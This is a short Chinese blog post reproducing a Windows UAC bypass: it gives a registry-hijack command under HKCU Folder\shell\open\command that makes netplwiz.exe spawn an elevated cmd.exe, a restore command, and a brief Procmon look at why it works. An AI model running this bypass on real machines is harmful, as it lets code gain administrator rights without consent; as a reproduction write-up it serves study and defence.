GUI_UAC_bypassX

  1. 前言
  2. bypass Demon
  3. 分析

前言

昨天晚上看群发现有人发了个新的Bypass UAC的文章。就复现了一下,顺便分析了一手= =

bypass Demon

链接:

https://github.com/sailay1996/GUI_UAC_bypassX/blob/master/README.md

然后惊人的发现执行的命令和今年1月的命令一毛一样。什么是忍甲,这就是忍甲

https://zhuanlan.zhihu.com/p/55728445

执行以下命令并打开netplwiz.exe然后找到高级点击管理密码,就会弹出个cmd

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

还原注册表:reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

分析

打开Procmon.exe配置以下过滤

然后搜索command关键字

大概的搜了一下HKCR注册表(忘了)

执行上面的命令在看了一下刚刚的那个位置发现被加载成功了

针对HKCU\Software\Classes\Folder\shell\open\command路径看了一下,发现执行了以上的命令打开上面文件夹,盘符等等。全部会执行你那个路径里设置的进程

后面问了某gay友知道HKCU\Software\Classes\Folder\shel这个路径是windows配置的。至于为什么会出现文件夹和盘符都是执行路径里设置的进程。我bu de而知


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:GUI_UAC_bypassX

本文作者:九世

发布时间:2019-09-03, 09:34:39

最后更新:2019-09-03, 10:02:57

原始链接:http://422926799.github.io/posts/3fa71b88.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录